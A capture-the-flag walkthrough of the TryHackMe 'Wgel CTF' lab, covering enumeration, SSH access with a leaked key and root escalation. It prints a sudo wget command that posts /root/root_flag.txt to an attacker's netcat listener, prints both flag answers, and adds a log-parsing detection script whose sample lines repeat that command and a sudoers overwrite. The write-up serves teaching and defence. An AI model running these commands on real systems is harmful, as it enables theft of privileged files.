[Hacking walkthrough] THM: Wgel CTF


Howdy there, welcome to another THM CTF challenge. Today, we are going to walk through a wget privilege escalation style CTF, just like the title suggests. This room is created by good old mrseth, who is also in charge of the tweety and boiler CTF rooms. He always puts the hint in the title. For me, this room is quite simple, provided you are not overthinking it again. Without further ado, let’s dig in.

Task 1: Capture the flags

Like the same old way, capture both user and root flags.

Task 1-2: User flag

First and foremost, enumerate the open ports using the Nmap scanner.

$ nmap -A -v <Machine IP>

Looks like we have two ports wide open on the machine: port 22 (SSH) and port 80 (HTTP). Since we have nothing to log in with on port 22 yet, port 80 might be the only way in.

At first glance, this is just a normal apache2 default page. If you are a web developer, or someone who has looked at the Apache default page often enough, you will notice something missing from the file table list. I highly suspect this page has been tampered with. Checking the source code of the page yields the following result.

Jessie, huh? Take note of that. After that, enumerate the site using gobuster for hidden directories.

$ gobuster dir -u <Machine IP> -w /usr/share/dirb/wordlists/common.txt

Gotcha! We got a /sitemap directory. Exploring the site itself won’t give us any information we need. Let’s run gobuster again, this time against that directory.

$ gobuster dir -u http://<Machine IP>/sitemap -w /usr/share/dirb/wordlists/common.txt

A hidden ssh directory? Let’s check it out.

Well, well, well, look what we got here, an RSA private key. Time to call Mr.john!

Hold your horses, no passphrase on the private key? Cool, that makes things simple. Alright lad, time to log in to Jessie’s SSH with the private key.

$ ssh -i id_rsa jessie@<Machine IP>

That’s it, we are inside Jessie’s SSH shell, but where is the flag?

Don’t be a lazy bum, find the flag.

Answer: 057c67131c3d5e42dd5cd3075b198ff6

Task 1-2: Root flag

Time for the root flag. Let’s see what Jessie can do with sudo.

Since we do not have Jessie’s password, we cannot simply escalate to the superuser with sudo or su. The only way left to us is the wget privilege escalation. After a short search, I came across this article. First, we need to open a listening port using Netcat on our own machine.

$ nc -lvnp 4445

After that, punch in the following command in Jessie’s SSH shell. The name of the flag file is root_flag.txt, just like the user one. The tunnel IP is your own (VPN) IP address, the one the machine can reach you on.

$ sudo /usr/bin/wget --post-file=/root/root_flag.txt http://<Tunnel IP>:4445

Bingo, we just captured the root flag.

Answer: b1b968b37519ad1daa6408188649263d
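From the defender’s side, the root cause here is a sudoers rule that lets a low-privilege user run wget as root, and the abuse is visible in the sudo log line that records the command. The script below is an added example, not part of the room or the write-up: it parses constructed auth.log style sudo lines and flags wget runs as root whose options make wget read a local file (such as --post-file, the trick used above) or write one (such as -O), which generalises the single --post-file case in the text.

```python
import re
import shlex
from pathlib import PurePosixPath

# Constructed sample sudo log lines (not captured from the room); lines 3 and 4 are benign.
SAMPLE_LOG = """\
Nov 12 10:02:17 wgel sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget --post-file=/root/root_flag.txt http://10.8.0.1:4445
Nov 12 10:03:40 wgel sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget http://10.8.0.1/x -O /etc/sudoers
Nov 12 10:05:02 wgel sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget https://example.org/file.tar.gz
Nov 12 10:06:11 wgel sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/apt-get update
"""

# Standard sudo log format: "sudo: <user> : TTY=... ; PWD=... ; USER=<target> ; COMMAND=<argv>"
SUDO_RE = re.compile(r"sudo:\s+(?P<who>\S+) : .*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$")

# wget options that make the (root) process read a local file or write one.
READ_OPTS = {"--post-file", "-i", "--input-file"}
WRITE_OPTS = {"-O", "--output-document", "-o", "--output-file"}


def wget_file_args(argv):
    """Yield (kind, option, path) for every wget argument that names a local file."""
    i = 1
    while i < len(argv):
        opt, _, val = argv[i].partition("=")       # handles --post-file=/path
        if opt in READ_OPTS or opt in WRITE_OPTS:
            if not val:                            # value given as the next token (-O /path)
                i += 1
                val = argv[i] if i < len(argv) else ""
            yield ("read" if opt in READ_OPTS else "write", opt, val)
        i += 1


def find_wget_file_abuse(log_text):
    """Return one finding per file-reading/writing wget option run as root via sudo."""
    findings = []
    for line in log_text.splitlines():
        m = SUDO_RE.search(line)
        if not m or m["target"] != "root":
            continue
        argv = shlex.split(m["cmd"])
        if not argv or PurePosixPath(argv[0]).name != "wget":
            continue
        for kind, opt, path in wget_file_args(argv):
            findings.append({"user": m["who"], "kind": kind, "option": opt, "path": path})
    return findings


if __name__ == "__main__":
    for f in find_wget_file_abuse(SAMPLE_LOG):
        print(f"ALERT: {f['user']} ran wget as root with {f['option']} ({f['kind']}) on {f['path']}")
```

The real fix is not a detection rule but removing wget (and any other file-reading tool) from the user’s sudoers entry; the script only tells you it has been used.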

Conclusion

That’s all for the Wgel CTF write-up. Another Linux sudo privilege escalation. Hope you learned something new today. Cheers! 😉


This Post Has 2 Comments

  1. ssh -i id_rsa jessie@10.10.31.227
    The authenticity of host '10.10.31.227 (10.10.31.227)' can't be established.
    ECDSA key fingerprint is SHA256:9XK3sKxz9xdPKOayx6kqd2PbTDDfGxj9K9aed2YtF0A.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '10.10.31.227' (ECDSA) to the list of known hosts.
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    Permissions 0644 for 'id_rsa' are too open.
    It is required that your private key files are NOT accessible by others.
    This private key will be ignored.
    Load key "id_rsa": bad permissions
    jessie@10.10.31.227's password:

    I can’t access the machine. Any ideas?

    1. Hi there, you need to set id_rsa to 600. Use this command

      chmod 600 id_rsa

      This is because the SSH private key shouldn’t be accessible to third parties.
